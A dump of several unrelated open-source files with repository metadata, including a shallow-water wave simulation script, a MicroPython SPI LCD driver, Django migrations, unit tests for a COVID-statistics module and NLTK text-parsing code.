bxxi = -a8*a9**2*sin(a9*x[i])
G[i] = u[i]*h[i]*(1 + hxi*bxi + 0.5*h[i]*bxxi + bxi*bxi) - h[i]*h[i]*hxi*uxi - h[i]*h[i]*h[i]/3.0*uxxi
return h,u,G,b,w
def close(t,ts,dt):
n = len(ts)
var = False
for i in range(n):
if abs(ts[i] - t) < dt:
var = True
return var
#Forcing Problem
wdir = "../../../../data/2018/raw/Thesis/Forced1/Dry/FEVM2/"
if not os.path.exists(wdir):
os.makedirs(wdir)
for ki in range(11,12):
wdirji = wdir + str(ki) + "/"
if not os.path.exists(wdirji):
os.makedirs(wdirji)
a8 = 1
a9 = 2*pi/50.0
width = 2*(2*pi/a9)
a0 = 0.0
a1 = 0.5
a2 = ((2*pi) / a9)/10.0
a3 = -pi/2.0/a9 -width/4.0
a4 = width/2**6
a5 = 0.0
a6 = a1
a7 = 0.0
g = 9.81
startx = -pi/2.0/a9 -width
endx = -pi/2.0/a9 +width
startt = 0.0
endt = (2*pi/a9) / a2
dx = width / (2.0)**(ki)
l = 0.5 / (a6*exp(a7*endt) + sqrt(g*(a0 + a1*exp(a5*endt))))
dt = l*dx
szoomx = startx
ezoomx = endx
t = startt
#x,t = makevar(startx,endx +0.1*dx,dx,startt,endt,dt)
x = arange(startx,endx +0.1*dx, dx)
xG = concatenate((array([x[0] - dx]),x,array([x[-1] + dx])))
xbed = []
for jio in range(len(xG)):
xbed.append(xG[jio] - 0.5*dx)
xbed.append(xG[jio] - dx/6.0)
xbed.append(xG[jio] + dx/6.0)
xbed.append(xG[jio] + 0.5*dx)
ts = []
n = len(x)
theta = 1.0
print(n)
gap = int(1.0/dt)
nBC = 2
GhnBC = 3
unBC = 3
bnBC = 4
nGhhbc = 3*n + 2*(GhnBC)
nubc =2*n -1 + 2*unBC
nbhbc =4*n + 2*(bnBC)
idx = 1.0 / dx
xhuMbeg = array([x[0] - 1.5*dx, x[0] - dx, x[0] -0.5*dx])
xhuMend = array([x[-1] + 0.5*dx, x[-1] + dx, x[-1] + 1.5*dx])
xbMend = array([x[-1] + 0.5*dx, x[-1] + 5*dx/6.0, x[-1] + 7*dx/6.0, x[-1] + 1.5*dx])
xbMbeg = array([x[0] - 1.5*dx, x[0] - 7*dx/6.0,x[0] - 5*dx/6.0 , x[0] -0.5*dx])
h,u,G,b,w = ForcedbedM(x,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
#bM = cos(a5*x)
print(t)
#hMbeg,uMbeg,GMbeg,bta,wMbeg = ForcedbedM(xhuMbeg,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
#hMend ,uMend ,GMend ,bta,wMend = ForcedbedM(xhuMend ,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
niBC = 4
xbegC = arange(startx - niBC*dx,startx,dx)
xendC = arange(endx + dx,endx + (niBC+1)*dx,dx)
hMbeg = a0*ones(GhnBC)
hMend = a0*ones(GhnBC)
wMbeg = hMbeg + a8*sin(a9*xhuMbeg)
wMend = hMend + a8*sin(a9*xhuMend)
uMbeg = zeros(unBC)
uMend = zeros(unBC)
GMbeg = zeros(GhnBC)
GMend = zeros(GhnBC)
bMbeg = a8*sin(a9*xbMbeg)
bMend = a8*sin(a9*xbMend)
b0C = a8*sin(a9*xbegC)
b1C = a8*sin(a9*xendC)
xbcC = concatenate([xbegC,x,xendC])
bbcC = concatenate([b0C,b,b1C])
xbcC_c = copyarraytoC(xbcC)
bbcC_c = copyarraytoC(bbcC)
u0C = u[0]*ones(niBC)
u1C = u[-1]*ones(niBC)
h0C = h[0]*ones(niBC)
h1C = h[-1]*ones(niBC)
G0C = G[0]*ones(niBC)
G1C = G[-1]*ones(niBC)
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
Eni = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pni = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mni = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gni = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
h_c = copyarraytoC(h)
G_c = copyarraytoC(G)
x_c = copyarraytoC(x)
b_c = copyarraytoC(b)
u_c = mallocPy(n)
hMbeg_c = copyarraytoC(hMbeg)
hMend_c = copyarraytoC(hMend)
wMbeg_c = copyarraytoC(wMbeg)
wMend_c = copyarraytoC(wMend)
bMbeg_c = copyarraytoC(bMbeg)
bMend_c = copyarraytoC(bMend)
GMbeg_c = copyarraytoC(GMbeg)
GMend_c = copyarraytoC(GMend)
uMbeg_c = copyarraytoC(uMbeg)
uMend_c = copyarraytoC(uMend)
ubc_c = mallocPy(nubc)
hhbc_c = mallocPy(nGhhbc)
whbc_c = mallocPy(nGhhbc)
Ghbc_c = mallocPy(nGhhbc)
bhbc_c = mallocPy(nbhbc)
wt = [0,endt/4.0,endt/2.0,3*endt/4.0,endt]
t = 0.0
ts.append(t)
#Just an FEM solve here
while t < endt:
if close(t,wt,dt):
hiC = copyarrayfromC(h_c,n)
GiC = copyarrayfromC(G_c,n)
getufromGsplit(h_c, G_c, b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,theta,dx,n,2*n +1,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,ubc_c,hhbc_c,Ghbc_c,whbc_c,bhbc_c)
uibcC = copyarrayfromC(ubc_c,nubc)
uiC = uibcC[unBC:-unBC:2]
wiC = hiC + b
u0C = uiC[0]*ones(niBC)
u1C = uiC[-1]*ones(niBC)
h0C = hiC[0]*ones(niBC)
h1C = hiC[-1]*ones(niBC)
G0C = GiC[0]*ones(niBC)
G1C = GiC[-1]*ones(niBC)
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
En = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pn = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mn = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gn = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
s = wdirji + "outList" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(["cell midpoint" ,'h', 'G' , 'u(m/s)','bed','w' ])
for j in range(n):
writefile2.writerow([str(x[j]), str(hiC[j]) , str(GiC[j]) , str(uiC[j]),str(b[j]),str(wiC[j])])
s = wdirji + "outSing" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(['dx' ,'dt','time',"Energy", "Mass", "Momentum", "G" ,"EnergyI", "MassI", "MomentumI", "GI" ])
writefile2.writerow([str(dx),str(dt),str(t),str(En),str(Mn),str(Pn),str(Gn),str(Eni),str(Mni),str(Pni),str(Gni)])
evolvewrapForcing(G_c,h_c,b_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c ,GMend_c,uMbeg_c,uMend_c,bMbeg_c,bMend_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,g,dx,dt,n,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,theta,hhbc_c, whbc_c,Ghbc_c,bhbc_c,ubc_c,x_c,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9)
t = t + dt
ts.append(t)
print(t)
hiC = copyarrayfromC(h_c,n)
GiC = copyarrayfromC(G_c,n)
getufromGsplit(h_c, G_c, b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,theta,dx,n,2*n +1,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,ubc_c,hhbc_c,Ghbc_c,whbc_c,bhbc_c)
hibcC = copyarrayfromC(hhbc_c,nubc)
hibcC = copyarrayfromC(hhbc_c,nubc)
uibcC = copyarrayfromC(ubc_c,nubc)
bibcC = copyarrayfromC(bhbc_c,nbhbc)
uiC = uibcC[unBC:-unBC:2]
wiC = hiC + b
u0C = uiC[0]*ones(niBC)
u1C = uiC[-1]*ones(niBC)
h0C = hiC[0]*ones(niBC)
h1C = hiC[-1]*ones(niBC)
G0C = GiC[0]*ones(niBC)
G1C = GiC[-1]*ones(niBC)
hbcC = concatenate([h0C,h,h1C])
ubcC = concatenate([u0C,u,u1C])
GbcC = concatenate([G0C,G,G1C])
hbcC_c = copyarraytoC(hbcC)
ubcC_c = copyarraytoC(ubcC)
GbcC_c = copyarraytoC(GbcC)
En = HankEnergyall(xbcC_c,hbcC_c,ubcC_c,bbcC_c,g,n + 2*niBC,niBC,dx)
Pn = uhall(xbcC_c,hbcC_c,ubcC_c,n + 2*niBC,niBC,dx)
Mn = hall(xbcC_c,hbcC_c,n + 2*niBC,niBC,dx)
Gn = Gall(xbcC_c,GbcC_c,n + 2*niBC,niBC,dx)
deallocPy(hbcC_c)
deallocPy(ubcC_c)
deallocPy(GbcC_c)
s = wdirji + "outList" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(["cell midpoint" ,'h', 'G' , 'u(m/s)','bed','w' ])
for j in range(n):
writefile2.writerow([str(x[j]), str(hiC[j]) , str(GiC[j]) , str(uiC[j]),str(b[j]),str(wiC[j])])
s = wdirji + "outSing" + str(t)+"s.txt"
with open(s,'a') as file2:
writefile2 = csv.writer(file2, delimiter = ',', quotechar='|', quoting=csv.QUOTE_MINIMAL)
writefile2.writerow(['dx' ,'dt','time',"Energy", "Mass", "Momentum", "G" ,"EnergyI", "MassI", "MomentumI", "GI" ])
writefile2.writerow([str(dx),str(dt),str(t),str(En),str(Mn),str(Pn),str(Gn),str(Eni),str(Mni),str(Pni),str(Gni)])
hA,uA,GA,bA,wA = ForcedbedM(x,t,a0,a1,a2,a3,a4,a5,a6,a7,a8,a9,g,dx)
hnorm = norm(hiC - hA, ord=2)/ norm(hA, ord=2)
unorm = norm(uiC - uA, ord=2)/ norm(uA, ord=2)
Gnorm = norm(GiC - GA, ord=2)/ norm(GA, ord=2)
hC1v = (Mn - Mni)/ Mni
uhC1v = (Pn - Pni)/Pni
GC1v = (Gn - Gni)/Gni
EC1v = (En - Eni)/Eni
s = wdir + "hL1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",hnorm)
file1.write(s)
s = wdir + "GL1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",Gnorm)
file1.write(s)
s = wdir + "uL1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",unorm)
file1.write(s)
s = wdir + "hC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",hC1v)
file1.write(s)
s = wdir + "GC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",uhC1v)
file1.write(s)
s = wdir + "uhC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",GC1v)
file1.write(s)
s = wdir + "HC1.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.20f\n" %(dx," ",EC1v)
file1.write(s)
deallocPy(h_c)
deallocPy(G_c)
deallocPy(u_c)
deallocPy(ubc_c)
deallocPy(hhbc_c)
deallocPy(whbc_c)
deallocPy(Ghbc_c)
deallocPy(bhbc_c)
deallocPy(hMbeg_c)
deallocPy(GMbeg_c)
deallocPy(uMbeg_c)
deallocPy(hMend_c)
deallocPy(GMend_c)
deallocPy(uMend_c)
deallocPy(wMbeg_c)
deallocPy(wMend_c)
"""
#Soliton Problem
wdir = "../../../../../../data/raw/Forced/P1P2P3BedFEM/GaussBedO/Soltest/"
if not os.path.exists(wdir):
os.makedirs(wdir)
for j in range(20):
g =9.81
a0 = 1.0
a1 = 1.0
width = 50
g = 9.81
dx = width / (2.0)**(j)
l = 0.5 / (sqrt(g*(a0 + a1)))
dt = l*dx
startx = -width/2
endx = width/2 + 0.9*dx
startt = 0.0
endt = 0.1
szoomx = startx
ezoomx = endx
t = 0
#x,t = makevar(startx,endx +0.1*dx,dx,startt,endt,dt)
x = arange(startx,endx +0.1*dx, dx)
xG = concatenate((array([x[0] - dx]),x,array([x[-1] + dx])))
ts = []
n = len(x)
theta = 2
gap = int(1.0/dt)
nBC = 2
GhnBC = 3
unBC = 3
bnBC = 4
nGhhbc = 3*n + 2*(GhnBC)
nubc =2*n -1 + 2*unBC
nbhbc =4*n + 2*(bnBC)
idx = 1.0 / dx
h,u,G,b = solitoninit(n,a0,a1,g,x,startt,0,dx)
w = h + b
print(t)
hMbeg = a0*ones(GhnBC)
hMend = a0*ones(GhnBC)
wMbeg = a0*ones(GhnBC)
wMend = a0*ones(GhnBC)
uMbeg = zeros(GhnBC)
uMend = zeros(GhnBC)
GMbeg = zeros(GhnBC)
GMend = zeros(GhnBC)
bMbeg = zeros(bnBC)
bMend = zeros(bnBC)
h_c = copyarraytoC(h)
G_c = copyarraytoC(G)
x_c = copyarraytoC(x)
b_c = copyarraytoC(b)
u_c = mallocPy(n)
hMbeg_c = copyarraytoC(hMbeg)
hMend_c = copyarraytoC(hMend)
wMbeg_c = copyarraytoC(wMbeg)
wMend_c = copyarraytoC(wMend)
bMbeg_c = copyarraytoC(bMbeg)
bMend_c = copyarraytoC(bMend)
GMbeg_c = copyarraytoC(GMbeg)
GMend_c = copyarraytoC(GMend)
uMbeg_c = copyarraytoC(uMbeg)
uMend_c = copyarraytoC(uMend)
ubc_c = mallocPy(nubc)
hhbc_c = mallocPy(nGhhbc)
whbc_c = mallocPy(nGhhbc)
Ghbc_c = mallocPy(nGhhbc)
bhbc_c = mallocPy(nbhbc)
t = 0.0
ts.append(t)
#Just an FEM solve here
while t < endt:
evolvewrapForcing(G_c,h_c,b_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c ,GMend_c,uMbeg_c,uMend_c,bMbeg_c,bMend_c,hMbeg_c,hMend_c,wMbeg_c,wMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,g,dx,dt,n,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,theta,hhbc_c, whbc_c,Ghbc_c,bhbc_c,ubc_c,x_c,t)
t = t + dt
ts.append(t)
print(t)
hC = copyarrayfromC(h_c,n)
GC = copyarrayfromC(G_c,n)
getufromG(h_c, G_c, b_c,hMbeg_c,hMend_c,GMbeg_c,GMend_c,uMbeg_c,uMend_c,wMbeg_c,wMend_c,bMbeg_c,bMend_c,theta,dx,n,2*n +1,GhnBC,unBC,bnBC,nGhhbc,nubc,nbhbc,ubc_c,hhbc_c,Ghbc_c,whbc_c,bhbc_c)
ubcC = copyarrayfromC(ubc_c,nubc)
uC = ubcC[unBC:-unBC:2]
hhbcC = copyarrayfromC(hhbc_c,nGhhbc)
whbcC = copyarrayfromC(whbc_c,nGhhbc)
GhbcC = copyarrayfromC(Ghbc_c,nGhhbc)
bhbcC = copyarrayfromC(bhbc_c,nbhbc)
hA,uA,GA,bA = solitoninit(n,a0,a1,g,x,t,0,dx)
wA = hA + bA
hnorm = norm(hC - hA, ord=2)/ norm(hC, ord=2)
unorm = norm(uC - uA, ord=2)/ norm(uC, ord=2)
Gnorm = norm(GC - GA, ord=2)/ norm(GC, ord=2)
s = wdir + "h.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.15f\n" %(dx," ",hnorm)
file1.write(s)
s = wdir + "G.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.15f\n" %(dx," ",Gnorm)
file1.write(s)
s = wdir + "u.dat"
with open(s,'a') as file1:
s ="%3.8f%5s%1.15f\n" %(dx," ",unorm)
file1.write(s)
deallocPy(h_c)
deallocPy(G_c)
deallocPy(u_c)
deallocPy(ubc_c)
deallocPy(hhbc_c)
deallocPy(whbc_c)
deallocPy(Ghbc_c)
deallocPy(bhbc_c)
deallocPy(hMbeg_c)
deallocPy(GMbeg_c)
deallocPy(uMbeg_c)
deallocPy(hMend_c)
deallocPy(GMend_c)
deallocPy(uMend_c)
deallocPy(wMbeg_c)
deallocPy(wMend_c)
"""
|
[
"jordanpitt3141@github.com"
] |
jordanpitt3141@github.com
|
76e5aac521950124056aa884c50b6caea915c5bd
|
2084fd977b41983d3e7039e55dccabc3140c123b
|
/scripts/slave/recipe_modules/recipe_autoroller/__init__.py
|
84c53d595824bddb7fd0b098957beca8d6698af4
|
[
"BSD-3-Clause"
] |
permissive
|
eunchong/build
|
14c0404ac3a9821bd88513afbc315ab18dbdd0ab
|
4e95fd33456e552bfaf7d94f7d04b19273d1c534
|
refs/heads/master
| 2021-01-21T14:06:13.614193
| 2016-05-28T05:12:07
| 2016-05-28T05:12:07
| 55,701,415
| 0
| 1
|
NOASSERTION
| 2020-07-23T11:05:04
| 2016-04-07T14:29:36
|
Python
|
UTF-8
|
Python
| false
| false
| 200
|
py
|
DEPS = [
'depot_tools/gclient',
'depot_tools/git',
'luci_config',
'recipe_engine/json',
'recipe_engine/path',
'recipe_engine/python',
'recipe_engine/step',
'recipe_engine/tempfile',
]
|
[
"phajdan.jr@chromium.org"
] |
phajdan.jr@chromium.org
|
9164389c9fadeaddb1a2030af2193a6e17899248
|
4137e27c5ed73c71f77421dfeb3c1949127fe61f
|
/4/lcdesp.py
|
5783ddca1437de1b8403ae599e65d7fcd55fef84
|
[] |
no_license
|
rwmatt/rpi
|
559b34fcdff5437134741b78f9da872e9c8e5419
|
76d3c7b1569bedcd2393d4c3eb52a77df5fa6b73
|
refs/heads/master
| 2020-09-17T08:44:20.963683
| 2019-11-21T17:42:50
| 2019-11-21T17:42:50
| 224,057,901
| 1
| 0
| null | 2019-11-25T23:02:39
| 2019-11-25T23:02:38
| null |
UTF-8
|
Python
| false
| false
| 722
|
py
|
from machine import Pin, SPI
from utime import sleep_ms
rs_pin = Pin(2, Pin.OUT) # Pin D4. Do NOT use the regular MISO pin (D6)
cs_pin = Pin(15, Pin.OUT) # aka SS slave select
cs_pin.on()
#spi = SPI(sck=Pin(14), mosi=Pin(13), miso=Pin(12))
spi = SPI(1)
spi.init(phase = 0)
spi.init(baudrate=400000)
def write_val(csv, c):
global cs_pin, rs_pin, spi
rs_pin.value(csv)
cs_pin.off()
spi.write(bytearray([c]))
#print(nbytes)
cs_pin.on()
sleep_ms(60)
contrast = 0x70 + 0b1000 # from 0x7C
display = 0b1111 # ori 0x0F
init = [0x39, 0x1D, 0x50, 0x6C, contrast , 0x38, display, 0x01, 0x06]
for c in init: write_val(0, c)
for c in ['H', 'E', 'L', 'L', 'O']: write_val(1, ord(c))
spi.deinit()
|
[
"alt.mcarter@gmail.com"
] |
alt.mcarter@gmail.com
|
ab4bfbd4dd1d1a9a1abc2f4fc50268183f7fb8d7
|
797686ff67cea2813efab056d2fb1458660af911
|
/venv/lib/python3.6/_weakrefset.py
|
dcc673e910c5f350456f38e901e424767553cc52
|
[] |
no_license
|
eyedontseeyou/trax
|
ca7dc8d133e197b8c4d87c9d07c1ced3617c2b36
|
3cab050dbe88a928d3888c36a679879923d48342
|
refs/heads/master
| 2021-06-26T16:37:45.464472
| 2017-08-10T18:10:36
| 2017-08-10T18:10:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 53
|
py
|
/Users/DASHRC/miniconda3/lib/python3.6/_weakrefset.py
|
[
"diegosanchez@bearfootworks.com"
] |
diegosanchez@bearfootworks.com
|
37ecd7a34b920c36a134674528f77f8a0c050536
|
802c76aab2f6e41b3fb1a591ebe982b32866df07
|
/qianliwang/apps/File/migrations/0007_auto_20200616_2248.py
|
7b89f3c63da8a3dc60c5f2fba8773eab06a723b8
|
[] |
no_license
|
lazyManCoder/slience
|
abf54c05c41eb28aee465dc4684e4f8572b90931
|
036eb3587ddedb0b31a53c604761d31b5e309b8d
|
refs/heads/master
| 2022-11-19T17:24:31.686120
| 2020-07-24T15:21:19
| 2020-07-24T15:21:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
# Generated by Django 2.2.1 on 2020-06-16 14:48
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('File', '0006_note'),
]
operations = [
migrations.AlterField(
model_name='note',
name='data',
field=models.CharField(max_length=6000, null=True),
),
]
|
[
"1490365616@qq.com"
] |
1490365616@qq.com
|
c3dbc544d9d518a59eeba6c6559a1a03ba823516
|
975d42b6d571b071347ecf0c11bc0768cdd1b2a4
|
/tests/tests.py
|
b88bbdc1955c61e18bb4e51ad67b2e6f0a408d35
|
[] |
no_license
|
dizak/covinfo
|
65f8b33ce93571e09cb72e573ced20e17f28ab77
|
ba46302c43e6041c42f6d8e63a121ac9b09a1e69
|
refs/heads/master
| 2021-05-22T15:19:30.813502
| 2020-05-02T13:01:14
| 2020-05-02T13:01:14
| 252,979,129
| 3
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,862
|
py
|
#pylint: disable=import-outside-toplevel,too-few-public-methods,bad-continuation
"""
Unit-tests for covinfo module
"""
import unittest
import json
class Request:
"""
Dummy request class mocking attributes holding by flask.Flask.request
"""
args = {}
def get(
self,
key,
):
"""
Return args
"""
return self.args[key]
class CovinfoTests(unittest.TestCase):
"""
Tests of covinfo module
"""
def setUp(self):
"""
Data and environment set-up for the tests
"""
from covinfo import main
self.main = main
self.request_empty = Request()
self.request = Request()
self.request_portugal_days_10 = Request()
self.request_portugal_days_10.args = {
'country': 'portugal',
'days': 10,
}
self.request.args = {
'country': 'poland',
'recoveryrate': ''
}
def test_get_daily_data_req_empty(self):
"""
Test if get_daily_data returns proper data if request args dict is
empty
"""
output = self.main.get_daily_data(self.request_empty)
self.assertIsInstance(
json.loads(output)[0],
dict,
)
def test_get_daily_data_req_args(self):
"""
Test if get_daily_data returns proper data
"""
output = self.main.get_daily_data(self.request)
self.assertIsInstance(
float(output),
float,
)
def test_get_changerate(self):
"""
Test if get_daily_data return proper data for change rate
"""
output = self.main.get_changerate(self.request_portugal_days_10)
#self.assertIsInstance(
# output,
# float,
#)
print(output)
|
[
"dariusz.izak@ibb.waw.pl"
] |
dariusz.izak@ibb.waw.pl
|
77e5a90be89e2b9b47ea56ee1ab0cebec00757b5
|
5eab827c7b49f87e010ad88430e3537b94f5fef4
|
/Project Exam-1/Individual Source Codes/Question-2.py
|
f7edd2f431e5fde39ed617119d00d1b07c3eb5d4
|
[] |
no_license
|
Shravyala/Python-Deep-Learning
|
4e6224d949c1a64515462e28cd81aa717de9aaa3
|
76e5d51dbdcca24619d44c4ac31eb29e3eb7180f
|
refs/heads/master
| 2022-11-25T14:27:23.702753
| 2020-07-30T05:03:01
| 2020-07-30T05:03:01
| 271,366,054
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,997
|
py
|
import pandas as pd
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn import metrics
import numpy as np
import seaborn as sns
#feeding the data Costomers.csv to data variable
data = pd.read_csv('Customers.csv')
# Null values condition check
nulls = pd.DataFrame(data.isnull().sum().sort_values(ascending=False)[:5])
nulls.columns = ['Null Count']
nulls.index.name = 'Feature'
print(nulls)
print(50*"==")
# Handling the null values if it has any
data = data.select_dtypes(include=[np.number]).interpolate().dropna()
# Using elbow method to find the good no. of clusters
wcss= []
#Taking only the last two columns that is spending and income
x = data.iloc[:,2:]
print(x)
#Visualising the data
sns.FacetGrid(x, height=4).map(plt.scatter, 'Annual Income (k$)', 'Spending Score (1-100)').add_legend()
plt.title('before clustering the data')
plt.show()
for i in range(1,11):
kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=300, n_init=10, random_state=0)
kmeans.fit(x)
wcss.append(kmeans.inertia_)
plt.plot(range(1,11),wcss)
plt.xlabel('Number of Clusters')
plt.ylabel('wcss')
plt.title('Elbow Graph')
plt.show()
# part - 2:
#From above plot we found that for no of clusters = 5 the graph is steadily decreasing
km =KMeans(n_clusters=5, random_state=0)
km.fit(x)
kmeans=km.predict(x)
# predict the cluster for each data point
y_cluster_kmeans = km.predict(x)
score = metrics.silhouette_score(x, y_cluster_kmeans)
print("Silhouette score is :",score)
x['res'] = y_cluster_kmeans
print(y_cluster_kmeans)
sns.FacetGrid(x,hue="res", height=4).map(plt.scatter, 'Annual Income (k$)', 'Spending Score (1-100)').add_legend()
plt.title('After clustering')
plt.show()
#Part -3
#From the first plot we can see that there the density of the values are
#formed at five different points so we can infer directly from the graph
#that we can use 5 clusters that is what we got from the elbow graph
|
[
"noreply@github.com"
] |
Shravyala.noreply@github.com
|
b50e909bcaf7a8eff6979490a05da8ef8b0d4eb3
|
b615302f6c5e4fbbd5b125523a660f7e5ebd97d1
|
/parse.py
|
1e7463b445488daeb02a2cdae04caa99dfe61420
|
[] |
no_license
|
cg439/MLProject
|
8bc4376862ed16b25a79b4b659a87209051d9110
|
95806cd354587bd653209fec14903990daa0e090
|
refs/heads/master
| 2021-01-18T14:05:15.351994
| 2014-12-11T04:50:19
| 2014-12-11T04:50:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,231
|
py
|
import nltk, re, os
#rev = os.listdir("Reviews/")
##takes in all the reviews in the directory Reviews and adds them to a reviews.txt
#if reviews.txt already has stuff in it and you want to add more, delete the content first,
#or else it will be duplicated
def concatReviews(filename):
with open(filename) as f:
content = f.readlines()
revs = open("reviews.txt", "a")
for line in content:
revs.write(line)
f.close()
#the below code is ran only once to create a file containing all reviews
# for r in rev:
# r = "Reviews/" + r
# concatReviews(r)
#splits a given file into sentences, appending to a sentence array
#it also stores the (word, sentence) into a hashtable
def splitBySentence(filename):
sentences = []
sentenceMap = {}
with open(filename) as f:
content = f.readlines()
for line in content:
split = re.split(r'[?!.]', line)
for word in split:
sentenceMap[word] = line
sentences.append(split)
return sentences, sentenceMap
#given a sentence array will tokenize them and then tag each word with POS
def posTag(sentences):
tokens = []
tagged = []
for sent in sentences:
tokens.append(nltk.word_tokenize(sent))
tagged = nltk.pos_tag(tokens)
return tokens, tagged
#example of how to use FreqDist. feed it an array of tokens.
#this returns 2 because 'abc' exists twice in the given array
#print nltk.FreqDist(['what', 'omg', 'abc', 'abc'])['abc']
#the below line finds the freq
#print nltk.FreqDist(['what', 'omg', 'abc', 'abc']).freq('abc')
#finds the most common n samples, n being 2 in this case, returning (sample, count)
#print nltk.FreqDist(['what', 'omg', 'abc', 'abc']).most_common(2)
#plots the frequency graph. require matplotlib
#nltk.FreqDist(['what','omg','abc','abc']).plot()
#tree creation, groups at given grammar
# grammar = "NP: {<DT>?<JJ>*<NN>}"
# cp = nltk.RegexpParser(grammar)
# result = cp.parse(sentence)
# print(result)
# result.draw()
#tree traversal
# def traverse(t):
# try:
# t.label()
# except AttributeError:
# print(t, end=" ")
# else:
# # Now we know that t.node is defined
# print('(', t.label(), end=" ")
# for child in t:
# traverse(child)
# print(')', end=" ")
|
[
"lcatherine.2828@yahoo.com"
] |
lcatherine.2828@yahoo.com
|
2976312d0df5d7dcef475c8adbf0f1c5b199284e
|
de55ba824daaf87208396502d48132b541c45b55
|
/webanalysis/migrations/0001_initial.py
|
488865a71b2f18ac3845016b7f0fc11f4a682f08
|
[] |
no_license
|
SK2-Angel/CMDB_V1.0
|
efcfd16d0531c755f9d3e0b0f27b7c03fb29436f
|
5c19625a42395025ae9181844e9add8bcdfcd0c8
|
refs/heads/master
| 2020-12-09T05:47:02.732391
| 2020-01-11T11:36:26
| 2020-01-11T11:36:26
| 233,211,027
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 713
|
py
|
# Generated by Django 2.0.5 on 2019-12-02 14:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='AccessLogfile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(default='', max_length=128)),
('path', models.CharField(default='', max_length=1024)),
('created_time', models.DateTimeField(auto_now_add=True)),
('status', models.IntegerField(default=0)),
],
),
]
|
[
"18530022535@163.com"
] |
18530022535@163.com
|
1bb2c38f5ac920acadf2b909fff16d8d37748f02
|
c47be0df7bf64f96f285061d886c1de1abb0d56e
|
/classes/Preprocessor.py
|
80d91332dcf79dda3e8e238415bf1a21211bd50f
|
[] |
no_license
|
UNREALre/TextAnalysis
|
e01fa78e84688285ae6386e77cf38adb18ce14f2
|
8c7ebb574cc208cfb2ce95f5fcc1fe82d06baa54
|
refs/heads/master
| 2022-11-06T01:10:37.056743
| 2020-06-23T13:44:14
| 2020-06-23T13:44:14
| 268,060,986
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,632
|
py
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from nltk import (pos_tag, sent_tokenize, wordpunct_tokenize)
